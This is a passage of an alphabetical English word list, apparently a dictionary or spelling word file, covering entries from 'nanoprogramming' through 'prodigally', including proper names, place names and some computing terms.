nanoprogramming nanosecond nanoseconds nanostore nanostores Nantucket Naomi nap napkin napkins Naples Napoleon Napoleonic Napoleonize Napoleonizes naps Narbonne narcissus narcotic narcotics Narragansett narrate narration narrative narratives narrow narrowed narrower narrowest narrowing narrowly narrowness narrows nary NASA nasal nasally NASAs Nash Nashua Nashville Nassau nastier nastiest nastily nastiness nasty Nat natal Natalie Natchez Nate Nathan Nathaniel nation national nationalist nationalists nationalities nationality nationalization nationalize nationalized nationalizes nationalizing nationally nationals nationhood nations nationwide native natively natives nativity NATO NATOs natural naturalism naturalist naturalization naturally naturalness naturals nature natured natures naught naughtier naughtiness naughty Naur nausea nauseate nauseum Navaho Navajo naval navally navel navies navigable navigate navigated navigates navigating navigation navigator navigators Navona navy nay Nazarene Nazareth Nazi Nazis Nazism Ndjamena Neal Neanderthal Neapolitan near nearby neared nearer nearest nearing nearly nearness nears nearsighted neat neater neatest neatly neatness Nebraska Nebraskan Nebuchadnezzar nebula nebular nebulous necessaries necessarily necessary necessitate necessitated necessitates necessitating necessitation necessities necessity neck necking necklace necklaces neckline necks necktie neckties necrosis nectar Ned need needed needful Needham needing needle needled needler needlers needles needless needlessly needlessness needlework needling needs needy Neff negate negated negates negating negation negations negative negatively negatives negator negators neglect neglected neglecting neglects negligee negligence negligent negligible negotiable negotiate negotiated negotiates negotiating negotiation negotiations Negro Negroes Negroid Negroization Negroizations Negroize Negroizes Nehru neigh neighbor neighborhood neighborhoods neighboring neighborly neighbors Neil neither Nell Nellie Nelsen Nelson nemesis neoclassic neon neonatal neophyte neophytes Nepal Nepali nephew nephews Neptune Nero nerve nerves nervous nervously nervousness Ness nest nested nester nesting nestle nestled nestles nestling Nestor nests net nether Netherlands nets netted netting nettle nettled network networked networking networks Neumann neural neuritis neurological neurologists neuron neurons neuroses neurosis neurotic neuter neutral neutralities neutrality neutralize neutralized neutralizing neutrally neutrino neutrinos neutron Neva Nevada never nevertheless Nevins new Newark Newbold newborn Newbury Newburyport Newcastle newcomer newcomers Newell newer newest Newfoundland newly newlywed Newman Newmanize Newmanizes newness Newport NeWS newscast newsgroup newsletter newsletters newsman newsmen newspaper newspapers newsstand Newsweek Newsweekly newt Newton Newtonian next Nguyen Niagara Niamey nibble nibbled nibbler nibblers nibbles nibbling Nibelung Nicaragua Niccolo nice nicely niceness nicer nicest niche Nicholas Nicholls Nichols Nicholson nick nicked nickel nickels nicker nicking Nicklaus nickname nicknamed nicknames nicks Nicodemus Nicosia nicotine niece nieces Nielsen Nielson Nietzsche nifty Niger Nigeria Nigerian nigh night nightcap nightclub nightfall nightgown nightingale nightingales nightly nightmare nightmares nightmarish nights nighttime nihilism Nijinsky Nikko Nikolai nil Nile Nilsen Nilsson nimble nimbleness nimbler nimbly nimbus Nina nine ninefold nines nineteen nineteens nineteenth nineties ninetieth ninety Nineveh ninth Niobe nip nipple Nippon Nipponize Nipponizes nips nitric nitrogen nitrous nitty Nixon no Noah Nobel nobility noble nobleman nobleness nobler nobles noblest nobly nobody nocturnal nocturnally nod nodal nodded nodding node nodes nods nodular nodule Noel Noetherian noise noiseless noiselessly noises noisier noisily noisiness noisy Nolan Noll nomenclature nominal nominally nominate nominated nominating nomination nominative nominee non nonadaptive nonbiodegradable nonblocking nonce nonchalant noncommercial noncommunication nonconsecutively nonconservative noncritical noncyclic nondecreasing nondescript nondescriptly nondestructively nondeterminacy nondeterminate nondeterminately nondeterminism nondeterministic nondeterministically none nonempty nonetheless nonexistence nonexistent nonextensible nonfunctional nongovernmental nonidempotent noninteracting noninterference noninterleaved nonintrusive nonintuitive noninverting nonlinear nonlinearities nonlinearity nonlinearly nonlocal nonmaskable nonmathematical nonmilitary nonnegative nonnegligible nonnumerical nonogenarian nonorthogonal nonorthogonality nonperishable nonpersistent nonportable nonprocedural nonprocedurally nonprofit nonprogrammable nonprogrammer nonsegmented nonsense nonsensical nonsequential nonspecialist nonspecialists nonstandard nonsynchronous nontechnical nonterminal nonterminals nonterminating nontermination nonthermal nontransparent nontrivial nonuniform nonuniformity nonzero noodle nook nooks noon noonday noons noontide noontime noose nor Nora Nordhoff Nordic Nordstrom Noreen Norfolk norm Norma normal normalcy normality normalization normalize normalized normalizes normalizing normally normals Norman Normandy Normanization Normanizations Normanize Normanizer Normanizers Normanizes normative norms Norris Norristown Norse north Northampton northbound northeast northeaster northeastern northerly northern northerner northerners northernly Northfield Northrop Northrup Northumberland northward northwards northwest northwestern Norton Norwalk Norway Norwegian Norwich nose nosed noses nosing nostalgia nostalgic Nostradamus Nostrand nostril nostrils not notable notables notably notarize notarized notarizes notarizing notary notation notational notations notch notched notches notching note notebook notebooks noted notes noteworthy nothing nothingness nothings notice noticeable noticeably noticed notices noticing notification notifications notified notifier notifiers notifies notify notifying noting notion notions notoriety notorious notoriously Notre Nottingham notwithstanding Nouakchott noun nouns nourish nourished nourishes nourishing nourishment Novak novel novelist novelists novels novelties novelty November Novembers novice novices Novosibirsk now nowadays nowhere noxious Noyes nozzle nu nuance nuances Nubia Nubian nubile nuclear nuclei nucleic nucleotide nucleotides nucleus nuclide nude nudge nudged nudity Nugent nugget nuisance nuisances null nullary nulled nullified nullifiers nullifies nullify nullifying nulls numb numbed number numbered numberer numbering numberless numbers numbing numbly numbness numbs numerable numeral numerals numerator numerators numeric numerical numerically numerics numerous numismatic numismatist nun nuns nuptial nurse nursed nurseries nursery nurses nursing nurture nurtured nurtures nurturing nut nutate nutria nutrient nutrition nutritious nuts nutshell nutshells nuzzle nylon nymph nymphomania nymphomaniac nymphs Nyquist oaf oak oaken Oakland Oakley Oakmont oaks oar oars oases oasis oat oaten oath oaths oatmeal oats obedience obediences obedient obediently obelisk Oberlin Oberon obese obey obeyed obeying obeys obfuscate obfuscatory obituary object objected objecting objection objectionable objections objective objectively objectives objector objectors objects obligated obligation obligations obligatory oblige obliged obliges obliging obligingly oblique obliquely obliqueness obliterate obliterated obliterates obliterating obliteration oblivion oblivious obliviously obliviousness oblong obnoxious oboe O'Brien obscene obscure obscured obscurely obscurer obscures obscuring obscurities obscurity obsequious observable observance observances observant observation observations observatory observe observed observer observers observes observing obsession obsessions obsessive obsolescence obsolescent obsolete obsoleted obsoletes obsoleting obstacle obstacles obstinacy obstinate obstinately obstruct obstructed obstructing obstruction obstructions obstructive obtain obtainable obtainably obtained obtaining obtains obviate obviated obviates obviating obviation obviations obvious obviously obviousness Occam occasion occasional occasionally occasioned occasioning occasionings occasions Occident Occidental Occidentalization Occidentalizations Occidentalize Occidentalized Occidentalizes Occidentalizing Occidentals occipital occlude occluded occludes occlusion occlusions occult occupancies occupancy occupant occupants occupation occupational occupationally occupations occupied occupier occupies occupy occupying occur occurred occurrence occurrences occurring occurs ocean Oceania oceanic oceanography oceans O'Connell O'Connor Oconomowoc octagon octagonal octahedra octahedral octahedron octal octane octave octaves Octavia octet octets October Octobers octogenarian octopus odd odder oddest oddities oddity oddly oddness odds ode O'Dell Oderberg Oderbergs odes Odessa Odin odious odiously odiousness odium O'Donnell odor odorous odorously odorousness odors O'Dwyer Odysseus Odyssey Oedipal Oedipally Oedipus of off Offenbach offend offended offender offenders offending offends offense offenses offensive offensively offensiveness offer offered offerer offerers offering offerings offers offhand office officemate officer officers offices official officialdom officially officials officiate officio officious officiously officiousness offing offload offs offset offsets offsetting offshore offspring oft often oftentimes Ogden oh O'Hare Ohio ohm ohmmeter oil oilcloth oiled oiler oilers oilier oiliest oiling oils oily ointment Ojibwa Okamoto okay Okinawa Oklahoma Oklahoman Olaf Olav old olden Oldenburg older oldest oldness Oldsmobile Olduvai oldy oleander O'Leary Oleg oleomargarine Olga oligarchy Oligocene Olin olive Oliver Olivers olives Olivetti Olivia Olivier Olsen Olson Olympia Olympian Olympianize Olympianizes Olympic Olympics Olympus Omaha Oman omega omelet omen omens omicron ominous ominously ominousness omission omissions omit omits omitted omitting omnibus omnidirectional omnipotent omnipresent omniscient omnisciently omnivore on onanism once oncology one Oneida O'Neill oneness onerous ones oneself onetime ongoing onion onions online onlooker only Onondaga onrush onset onsets onslaught Ontario onto ontology onus onward onwards onyx ooze oozed opacity opal opals opaque opaquely opaqueness opcode OPEC Opel open opened opener openers opening openings openly openness opens opera operable operand operandi operands operas operate operated operates operating operation operational operationally operations operative operatives operator operators operetta Ophiuchus Ophiucus opiate opinion opinions opium opossum Oppenheimer opponent opponents opportune opportunely opportunism opportunistic opportunities opportunity opposable oppose opposed opposes opposing opposite oppositely oppositeness opposites opposition oppress oppressed oppresses oppressing oppression oppressive oppressor oppressors opprobrium opt opted opthalmic optic optical optically optics optima optimal optimality optimally optimism optimist optimistic optimistically optimization optimizations optimize optimized optimizer optimizers optimizes optimizing optimum opting option optional optionally options optoacoustic optometrist optometry opts opulence opulent opus or oracle oracles oral orally orange oranges orangutan oration orations orator oratories orators oratory orb orbit orbital orbitally orbited orbiter orbiters orbiting orbits orchard orchards orchestra orchestral orchestras orchestrate orchid orchids ordain ordained ordaining ordains ordeal order ordered ordering orderings orderlies orderly orders ordinal ordinance ordinances ordinarily ordinariness ordinary ordinate ordinates ordination ore oregano Oregon Oregonians ores Oresteia Orestes organ organic organism organisms organist organists organizable organization organizational organizationally organizations organize organized organizer organizers organizes organizing organs orgasm orgiastic orgies orgy Orient Oriental Orientalization Orientalizations Orientalize Orientalized Orientalizes Orientalizing Orientals orientation orientations oriented orienting orients orifice orifices origin original originality originally originals originate originated originates originating origination originator originators origins Orin Orinoco oriole Orion Orkney Orlando Orleans Orlick Orly ornament ornamental ornamentally ornamentation ornamented ornamenting ornaments ornate ornery Orono orphan orphanage orphaned orphans Orpheus Orphic Orphically Orr Ortega orthant orthodontist orthodox orthodoxy orthogonal orthogonality orthogonally orthopedic Orville Orwell Orwellian Osaka Osbert Osborn Osborne Oscar oscillate oscillated oscillates oscillating oscillation oscillations oscillator oscillators oscillatory oscilloscope oscilloscopes Osgood O'Shea Oshkosh Osiris Oslo osmosis osmotic ossify ostensible ostensibly ostentatious osteopath osteopathic osteopathy osteoporosis ostracism Ostrander ostrich ostriches O'Sullivan Oswald Othello other others otherwise otherworldly Otis Ott Ottawa otter otters Otto Ottoman Ottomanization Ottomanizations Ottomanize Ottomanizes Ouagadougou ouch ought ounce ounces our ours ourself ourselves oust out outbound outbreak outbreaks outburst outbursts outcast outcasts outcome outcomes outcries outcry outdated outdo outdoor outdoors outer outermost outfit outfits outfitted outgoing outgrew outgrow outgrowing outgrown outgrows outgrowth outing outlandish outlast outlasts outlaw outlawed outlawing outlaws outlay outlays outlet outlets outline outlined outlines outlining outlive outlived outlives outliving outlook outlying outnumbered outperform outperformed outperforming outperforms outpost outposts output outputs outputting outrage outraged outrageous outrageously outrages outright outrun outruns outs outset outside outsider outsiders outskirts outstanding outstandingly outstretched outstrip outstripped outstripping outstrips outvote outvoted outvotes outvoting outward outwardly outweigh outweighed outweighing outweighs outwit outwits outwitted outwitting oval ovals ovaries ovary oven ovens over overall overalls overboard overcame overcoat overcoats overcome overcomes overcoming overcrowd overcrowded overcrowding overcrowds overdone overdose overdraft overdrafts overdue overemphasis overemphasized overestimate overestimated overestimates overestimating overestimation overflow overflowed overflowing overflows overgrown overhang overhanging overhangs overhaul overhauling overhead overheads overhear overheard overhearing overhears overjoy overjoyed overkill overland overlap overlapped overlapping overlaps overlay overlaying overlays overload overloaded overloading overloads overlook overlooked overlooking overlooks overly overnight overnighter overnighters overpower overpowered overpowering overpowers overprint overprinted overprinting overprints overproduction overridden override overrides overriding overrode overrule overruled overrules overrun overrunning overruns overseas oversee overseeing overseer overseers oversees overshadow overshadowed overshadowing overshadows overshoot overshot oversight oversights oversimplified oversimplifies oversimplify oversimplifying oversized overstate overstated overstatement overstatements overstates overstating overstocks oversubscribed overt overtake overtaken overtaker overtakers overtakes overtaking overthrew overthrow overthrown overtime overtly overtone overtones overtook overture overtures overturn overturned overturning overturns overuse overview overviews overwhelm overwhelmed overwhelming overwhelmingly overwhelms overwork overworked overworking overworks overwrite overwrites overwriting overwritten overzealous Ovid owe owed Owen Owens owes owing owl owls own owned owner owners ownership ownerships owning owns ox oxen Oxford oxide oxides oxidize oxidized Oxnard Oxonian oxygen oyster oysters Oz Ozark Ozarks ozone Ozzie Pablo Pabst pace paced pacemaker pacer pacers paces pacific pacification pacified pacifier pacifies pacifism pacifist pacify pacing pack package packaged packager packagers packages packaging packagings Packard Packards packed packer packers packet packets packing packs Packwood pact pacts pad padded padding paddle paddock paddy padlock pads pagan Paganini pagans page pageant pageantry pageants paged pager pagers pages paginate paginated paginates paginating pagination paging pagoda paid pail pails pain Paine pained painful painfully painless pains painstaking painstakingly paint painted painter painters painting paintings paints pair paired pairing pairings pairs pairwise pajama pajamas Pakistan Pakistani Pakistanis pal palace palaces palate palates Palatine pale paled palely paleness Paleolithic Paleozoic paler Palermo pales palest Palestine Palestinian palfrey palindrome palindromic paling pall Palladian palladium palliate palliative pallid palm palmed palmer palming Palmolive palms Palmyra Palo Palomar palpable pals palsy Pam Pamela pamper pamphlet pamphlets pan panacea panaceas panama Panamanian pancake pancakes Pancho panda Pandanus pandas pandemic pandemonium pander Pandora pane panel paneled paneling panelist panelists panels panes pang Pangaea pangs panic panicked panicking panicky panics panned panning panorama panoramic pans pansies pansy pant panted pantheism pantheist pantheon panther panthers panties panting pantomime pantries pantry pants panty pantyhose Paoli papa papal paper paperback paperbacks papered paperer paperers papering paperings papers paperweight paperwork papoose Pappas Papua papyrus par parabola parabolic paraboloid paraboloidal parachute parachuted parachutes parade paraded parades paradigm paradigms parading paradise paradox paradoxes paradoxical paradoxically paraffin paragon paragons paragraph paragraphing paragraphs Paraguay Paraguayan Paraguayans parakeet parallax parallel paralleled paralleling parallelism parallelize parallelized parallelizes parallelizing parallelogram parallelograms parallels paralysis paralyze paralyzed paralyzes paralyzing parameter parameterizable parameterization parameterizations parameterize parameterized parameterizes parameterizing parameterless parameters parametric parametrized paramilitary paramount Paramus paranoia paranoiac paranoid paranormal parapet parapets paraphernalia paraphrase paraphrased paraphrases paraphrasing parapsychology parasite parasites parasitic parasitics parasol parboil PARC parcel parceled parceling parcels parch parched parchment pardon pardonable pardonably pardoned pardoner pardoners pardoning pardons pare paregoric parent parentage parental parentheses parenthesis parenthesized parenthesizes parenthesizing parenthetic parenthetical parenthetically parenthood parents pares Pareto pariah parimutuel paring parings Paris parish parishes parishioner Parisian Parisianization Parisianizations Parisianize Parisianizes parity park Parke parked parker parkers Parkersburg Parkhouse parking Parkinson Parkinsonian parkland parklike Parks parkway parlay parley parliament parliamentarian parliamentary parliaments parlor parlors Parmesan parochial parody parole paroled paroles paroling Parr parried Parrish parrot parroting parrots Parrs parry pars parse parsed parser parsers parses Parsi Parsifal parsimony parsing parsings parsley parson Parsons part partake partaker partakes partaking parted parter parters Parthenon Parthia partial partiality partially participant participants participate participated participates participating participation participle particle particles particular particularly particulars particulate parties parting partings partisan partisans partition partitioned partitioning partitions partly partner partnered partners partnership partook partridge partridges parts party Pasadena PASCAL Pascal Paso pass passage passages passageway Passaic passe passed passenger passengers passer passers passes passing passion passionate passionately passions passivate passive passively passiveness passivity Passover passport passports password passwords past paste pasted pastel Pasternak pastes Pasteur pastime pastimes pasting pastness pastor pastoral pastors pastry pasts pasture pastures pat Patagonia Patagonians patch patched patches patching patchwork patchy pate paten patent patentable patented patenter patenters patenting patently patents paternal paternally paternoster Paterson path pathetic pathname pathnames pathogen pathogenesis pathological pathology pathos paths pathway pathways patience patient patiently patients patina patio patriarch patriarchal patriarchs patriarchy Patrice Patricia patrician patricians Patrick patrimonial patrimony patriot patriotic patriotism patriots patrol patrolled patrolling patrolman patrolmen patrols patron patronage patronize patronized patronizes patronizing patrons pats Patsies Patsy patter pattered pattering patterings pattern patterned patterning patterns patters Patterson Patti patties Patton patty paucity Paul Paula Paulette Pauli Pauline Pauling Paulinize Paulinizes Paulo Paulsen Paulson Paulus paunch paunchy pauper pause paused pauses pausing pave paved pavement pavements paves pavilion pavilions paving Pavlov Pavlovian paw pawing pawn pawns pawnshop paws Pawtucket pay payable paycheck paychecks payed payer payers paying payment payments Payne Paynes Paynize Paynizes payoff payoffs payroll pays Payson Paz pea Peabody peace peaceable peaceful peacefully peacefulness peacetime peach peaches Peachtree peacock peacocks peak peaked peaks peal Peale pealed pealing peals peanut peanuts pear Pearce pearl pearls pearly pears Pearson peas peasant peasantry peasants Pease peat pebble pebbles peccary peck pecked pecking pecks Pecos pectoral peculiar peculiarities peculiarity peculiarly pecuniary pedagogic pedagogical pedagogically pedagogy pedal pedant pedantic pedantry peddle peddler peddlers pedestal pedestrian pedestrians pediatric pediatrician pediatrics pedigree Pedro peek peeked peeking peeks peel peeled peeling peels peep peeped peeper peephole peeping peeps peer peered peering peerless peers peg Pegasus pegboard Peggy pegs Peiping pejorative Peking Pelham pelican pellagra Peloponnese pelt pelting pelts pelvic pelvis Pembroke pen penal penalize penalized penalizes penalizing penalties penalty penance pence penchant pencil penciled pencils pend pendant pended pending Pendleton pends pendulum pendulums Penelope penetrable penetrate penetrated penetrates penetrating penetratingly penetration penetrations penetrative penetrator penetrators penguin penguins Penh penicillin peninsula peninsulas penis penises penitent penitentiary Penn penned pennies penniless penning Pennsylvania penny Penrose pens Pensacola pension pensioner pensions pensive pent pentagon pentagons Pentateuch Pentecost pentecostal penthouse penultimate penumbra peony people peopled peoples Peoria pep pepper peppered peppering peppermint pepperoni peppers peppery peppy Pepsi PepsiCo Pepsico peptide per perceivable perceivably perceive perceived perceiver perceivers perceives perceiving percent percentage percentages percentile percentiles percents perceptible perceptibly perception perceptions perceptive perceptively perceptual perceptually perch perchance perched perches perching Percival percussion percutaneous Percy peremptory perennial perennially Perez perfect perfected perfectible perfecting perfection perfectionist perfectionists perfectly perfectness perfects perforce perform performance performances performed performer performers performing performs perfume perfumed perfumes perfuming perfunctory Pergamon perhaps Periclean Pericles perihelion peril Perilla perilous perilously perils perimeter period periodic periodical periodically periodicals periods peripheral peripherally peripherals peripheries periphery periscope perish perishable perishables perished perisher perishers perishes perishing perjure perjury perk Perkins perky Perle permanence permanent permanently permeable permeate permeated permeates permeating permeation Permian permissibility permissible permissibly permission permissions permissive permissively permit permits permitted permitting permutation permutations permute permuted permutes permuting pernicious Pernod peroxide perpendicular perpendicularly perpendiculars perpetrate perpetrated perpetrates perpetrating perpetration perpetrations perpetrator perpetrators perpetual perpetually perpetuate perpetuated perpetuates perpetuating perpetuation perpetuity perplex perplexed perplexing perplexity Perry persecute persecuted persecutes persecuting persecution persecutor persecutors Perseid Persephone Perseus perseverance persevere persevered perseveres persevering Pershing Persia Persian Persianization Persianizations Persianize Persianizes Persians persist persisted persistence persistent persistently persisting persists person personage personages personal personalities personality personalization personalize personalized personalizes personalizing personally personification personified personifies personify personifying personnel persons perspective perspectives perspicuous perspicuously perspiration perspire persuadable persuade persuaded persuader persuaders persuades persuading persuasion persuasions persuasive persuasively persuasiveness pertain pertained pertaining pertains Perth pertinent perturb perturbation perturbations perturbed Peru perusal peruse perused peruser perusers peruses perusing Peruvian Peruvianize Peruvianizes Peruvians pervade pervaded pervades pervading pervasive pervasively perversion pervert perverted perverts pessimism pessimist pessimistic pest pester pesticide pestilence pestilent pests pet petal petals Pete Peter Peters Petersburg Petersen Peterson petition petitioned petitioner petitioning petitions Petkiewicz petri petroleum pets petted petter petters Pettibone petticoat petticoats pettiness petting petty petulance petulant Peugeot pew Pewaukee pews pewter Pfizer Phaedra phantom phantoms pharmaceutic pharmacist pharmacology pharmacopoeia pharmacy phase phased phaser phasers phases phasing pheasant pheasants Phelps phenomena phenomenal phenomenally phenomenological phenomenologically phenomenologies phenomenology phenomenon phi PHIGS Phil Philadelphia philanthropy Philco philharmonic Philip Philippe Philippians Philippine Philippines Philistine Philistines Philistinize Philistinizes Phillies Phillip Phillips Philly philosopher philosophers philosophic philosophical philosophically philosophies philosophize philosophized philosophizer philosophizers philosophizes philosophizing philosophy Phipps Phobos Phoenicia phoenix phone phoned phoneme phonemes phonemic phones phonetic phonetics phoning phonograph phonographs phony phosgene phosphate phosphates phosphor phosphorescent phosphoric phosphorus photo photocopied photocopier photocopiers photocopies photocopy photocopying photodiode photodiodes photogenic photograph photographed photographer photographers photographic photographing photographs photography photon photos photosensitive phototypesetter phototypesetters phrase phrased phraseology phrases phrasing phrasings phyla Phyllis phylum physic physical physically physicalness physicals physician physicians physicist physicists physics physiological physiologically physiology physiotherapist physiotherapy physique phytoplankton pi pianist piano pianos pica picas Picasso picayune Piccadilly piccolo pick pickaxe picked picker Pickering pickers picket picketed picketer picketers picketing pickets Pickett Pickford picking pickings pickle pickled pickles pickling Pickman picks pickup pickups picky picnic picnicked picnicking picnics picofarad picojoule picosecond Pict pictorial pictorially picture pictured pictures picturesque picturesqueness picturing piddle pidgin pie piece pieced piecemeal pieces piecewise piecing Piedfort Piedmont pier pierce pierced pierces piercing Pierre piers Pierson pies piety piezoelectric pig pigeon pigeonhole pigeons piggish piggy piggyback piggybacked piggybacking piggybacks pigment pigmentation pigmented pigments pigpen pigs pigskin pigtail pike piker pikes Pilate pile piled pilers piles pilfer pilferage pilgrim pilgrimage pilgrimages pilgrims piling pilings pill pillage pillaged pillar pillared pillars pillory pillow pillows pills Pillsbury pilot piloting pilots pimp pimple pin pinafore pinball pinch pinched pinches pinching pincushion pine pineapple pineapples pined Pinehurst pines ping pinhead pinhole pining pinion pink pinker pinkest pinkie pinkish pinkly pinkness pinks pinnacle pinnacles pinned pinning pinnings pinochle pinpoint pinpointing pinpoints pins pinscher Pinsky pint pinto pints pinwheel pion pioneer pioneered pioneering pioneers Piotr pious piously pip pipe piped pipeline pipelined pipelines pipelining Piper pipers pipes Pipestone pipette piping pique piracy Piraeus pirate pirates Pisa Piscataway Pisces piss pistachio pistil pistils pistol pistols piston pistons pit pitch pitched pitcher pitchers pitches pitchfork pitching piteous piteously pitfall pitfalls pith pithed pithes pithier pithiest pithiness pithing pithy pitiable pitied pitier pitiers pities pitiful pitifully pitiless pitilessly Pitney pits Pitt pitted Pittsburgh Pittsburghers Pittsfield Pittston pituitary pity pitying pityingly Pius pivot pivotal pivoting pivots pixel pixels Pizarro pizza placard placards placate place placebo placed placeholder placement placements placenta placental placer places placid placidly placing plagiarism plagiarist plague plagued plagues plaguing plaid plaids plain plainer plainest Plainfield plainly plainness plains plaintext plaintexts plaintiff plaintiffs plaintive plaintively plaintiveness Plainview plait plaits plan planar planarity Planck plane planed planeload planer planers planes planet planetaria planetarium planetary planetesimal planetoid planets planing plank planking planks plankton planned planner planners planning planoconcave planoconvex plans plant plantation plantations planted planter planters planting plantings plants plaque plasma plaster plastered plasterer plastering plasters plastic plasticity plastics plate plateau plateaus plated platelet platelets platen platens plates platform platforms plating platinum platitude Plato platonic Platonism Platonist platoon Platte platter platters Platteville plausibility plausible play playable playback playboy played player players playful playfully playfulness playground playgrounds playhouse playing playmate playmates playoff playroom plays plaything playthings playtime playwright playwrights playwriting plaza plea plead pleaded pleader pleading pleads pleas pleasant pleasantly pleasantness please pleased pleases pleasing pleasingly pleasure pleasures pleat plebeian plebian plebiscite plebiscites pledge pledged pledges Pleiades Pleistocene plenary plenipotentiary plenteous plentiful plentifully plenty plethora pleurisy Plexiglas pliable pliant plied pliers plies plight Pliny Pliocene plod plodding plot plots plotted plotter plotters plotting plow plowed plower plowing plowman plows plowshare ploy ploys pluck plucked plucking plucks plucky plug pluggable plugged plugging plugs plum plumage plumb plumbed plumbing plumbs plume plumed plumes plummet plummeting plump plumped plumpness plums plunder plundered plunderer plunderers plundering plunders plunge plunged plunger plungers plunges plunging plunk plural plurality plurals plus pluses plush Plutarch Pluto plutonium ply Plymouth plywood pneumatic pneumonia Po poach poacher poaches Pocahontas pocket pocketbook pocketbooks pocketed pocketful pocketing pockets Pocono Poconos pod podia podium pods Podunk Poe poem poems poet poetic poetical poetically poetics poetries poetry poets pogo pogrom poignancy poignant Poincare Poindexter point pointed pointedly pointer pointers pointing pointless points pointy poise poised poises poison poisoned poisoner poisoning poisonous poisonousness poisons Poisson poke poked poker pokerface pokes poking Poland polar Polaris polarities polarity Polaroid pole polecat poled polemic polemics poles police policed policeman policemen polices policies policing policy poling polio polish polished polisher polishers polishes polishing Politburo polite politely politeness politer politest politic political politically politician politicians politicking politics Polk polka poll Pollard polled pollen polling polloi polls pollutant pollute polluted pollutes polluting pollution Pollux polo polyalphabetic polygon polygons Polyhymnia polymer polymers polymorphic Polynesia Polynesian polynomial polynomials Polyphemus polytechnic polytheist Pomerania Pomeranian Pomona pomp pompadour Pompeii Pompey pomposity pompous pompously pompousness Ponce Ponchartrain poncho pond ponder pondered pondering ponderous ponders ponds pong ponies Pontiac pontiff pontific pontificate pony pooch poodle pool Poole pooled pooling pools poor poorer poorest poorly poorness pop popcorn Pope Popek Popeks popish poplar poplin popped poppies popping poppy pops Popsicle Popsicles populace popular popularity popularization popularize popularized popularizes popularizing popularly populate populated populates populating population populations populous populousness porcelain porch porches porcine porcupine porcupines pore pored pores poring pork porker pornographer pornographic pornography porous porpoise porridge port portability portable portage portal portals Porte ported portend portended portending portends portent portentous porter porterhouse porters portfolio portfolios Portia portico porting portion portions Portland portly portmanteau Porto portrait portraits portray portrayal portrayed portraying portrays ports Portsmouth Portugal Portuguese pose posed Poseidon poser posers poses posh posing posit posited positing position positional positioned positioning positions positive positively positiveness positives positron posits Posner posse possess possessed possesses possessing possession possessional possessions possessive possessively possessiveness possessor possessors possibilities possibility possible possibly possum possums post postage postal postcard postcondition postdoctoral posted poster posterior posteriori posterity posters postfix postgraduate posting postlude postman postmark postmaster postmasters postmortem postoperative postorder postpone postponed postponing postprocess postprocessor posts postscript postscripts postulate postulated postulates postulating postulation postulations posture postures pot potable potash potassium potato potatoes potbelly Potemkin potent potentate potentates potential potentialities potentiality potentially potentials potentiating potentiometer potentiometers pothole potion potlatch Potomac potpourri pots Potsdam Pottawatomie potted potter potters pottery potting Potts pouch pouches Poughkeepsie poultice poultry pounce pounced pounces pouncing pound pounded pounder pounders pounding pounds pour poured pourer pourers pouring pours Poussin Poussins pout pouted pouting pouts poverty powder powdered powdering powderpuff powders powdery Powell power powered powerful powerfully powerfulness powering powerless powerlessly powerlessness Powers pox Poynting practicable practicably practical practicality practically practice practiced practices practicing practitioner practitioners Pradesh Prado pragmatic pragmatically pragmatics pragmatism pragmatist Prague prairie praise praised praiser praisers praises praiseworthy praising praisingly prance pranced prancer prancing prank pranks prate Pratt Prattville Pravda pray prayed prayer prayers praying preach preached preacher preachers preaches preaching preallocate preallocated preallocating preamble preambles preassign preassigned preassigning preassigns Precambrian precarious precariously precariousness precaution precautions precede preceded precedence precedences precedent precedented precedents precedes preceding precept precepts precess precession precinct precincts precious preciously preciousness precipice precipitable precipitate precipitated precipitately precipitateness precipitates precipitating precipitation precipitous precipitously precise precisely preciseness precision precisions preclude precluded precludes precluding precocious precociously precocity precompute precomputed precomputing preconceive preconceived preconception preconceptions precondition preconditioned preconditions precursor precursors predate predated predates predating predatory predecessor predecessors predefine predefined predefines predefining predefinition predefinitions predetermination predetermine predetermined predetermines predetermining predicament predicate predicated predicates predicating predication predications predict predictability predictable predictably predicted predicting prediction predictions predictive predictor predicts predilection predilections predisposition predominant predominantly predominate predominated predominately predominates predominating predomination preeminence preeminent preempt preempted preempting preemption preemptive preemptor preempts preen preexisting prefab prefabricate preface prefaced prefaces prefacing prefer preferable preferably preference preferences preferential preferentially preferred preferring prefers prefix prefixed prefixes prefixing pregnancy pregnant prehistoric preinitialize preinitialized preinitializes preinitializing prejudge prejudged prejudice prejudiced prejudices prejudicial prelate preliminaries preliminary prelude preludes premature prematurely prematurity premeditated premeditation premier premiers premise premises premium premiums premonition prenatal Prentice Prenticed Prenticing preoccupation preoccupied preoccupies preoccupy prep preparation preparations preparative preparatives preparatory prepare prepared prepares preparing prepend prepended prepending preposition prepositional prepositions preposterous preposterously preprocessed preprocessing preprocessor preprocessors preproduction preprogrammed prerequisite prerequisites prerogative prerogatives Presbyterian Presbyterianism Presbyterianize Presbyterianizes Prescott prescribe prescribed prescribes prescription prescriptions prescriptive preselect preselected preselecting preselects presence presences present presentation presentations presented presenter presenting presently presentness presents preservation preservations preserve preserved preserver preservers preserves preserving preset preside presided presidency president presidential presidents presides presiding Presley press pressed presser presses pressing pressings pressure pressured pressures pressuring pressurize pressurized prestidigitate prestige prestigious Preston presumably presume presumed presumes presuming presumption presumptions presumptive presumptuous presumptuousness presuppose presupposed presupposes presupposing presupposition pretend pretended pretender pretenders pretending pretends pretense pretenses pretension pretensions pretentious pretentiously pretentiousness pretext pretexts Pretoria Pretorian prettier prettiest prettily prettiness pretty prevail prevailed prevailing prevailingly prevails prevalence prevalent prevalently prevent preventable preventably prevented preventing prevention preventive preventives prevents preview previewed previewing previews previous previously prey preyed preying preys Priam price priced priceless pricer pricers prices pricing prick pricked pricking prickly pricks pride prided prides priding priest Priestley priggish prim prima primacy primal primaries primarily primary primate prime primed primeness primer primers primes primeval priming primitive primitively primitiveness primitives primrose prince princely princes princess princesses Princeton principal principalities principality principally principals Principia principle principled principles print printable printably printed printer printers printing printout prints prior priori priorities priority priory Priscilla prism prisms prison prisoner prisoners prisons pristine Pritchard privacies privacy private privately privates privation privations privies privilege privileged privileges privy prize prized prizer prizers prizes prizewinning prizing pro probabilistic probabilistically probabilities probability probable probably probate probated probates probating probation probative probe probed probes probing probings probity problem problematic problematical problematically problems procaine procedural procedurally procedure procedures proceed proceeded proceeding proceedings proceeds process processed processes processing procession processor processors proclaim proclaimed proclaimer proclaimers proclaiming proclaims proclamation proclamations proclivities proclivity procotols procrastinate procrastinated procrastinates procrastinating procrastination procreate Procrustean Procrusteanize Procrusteanizes Procrustes Procter procure procured procurement procurements procurer procurers procures procuring Procyon prod prodigal prodigally 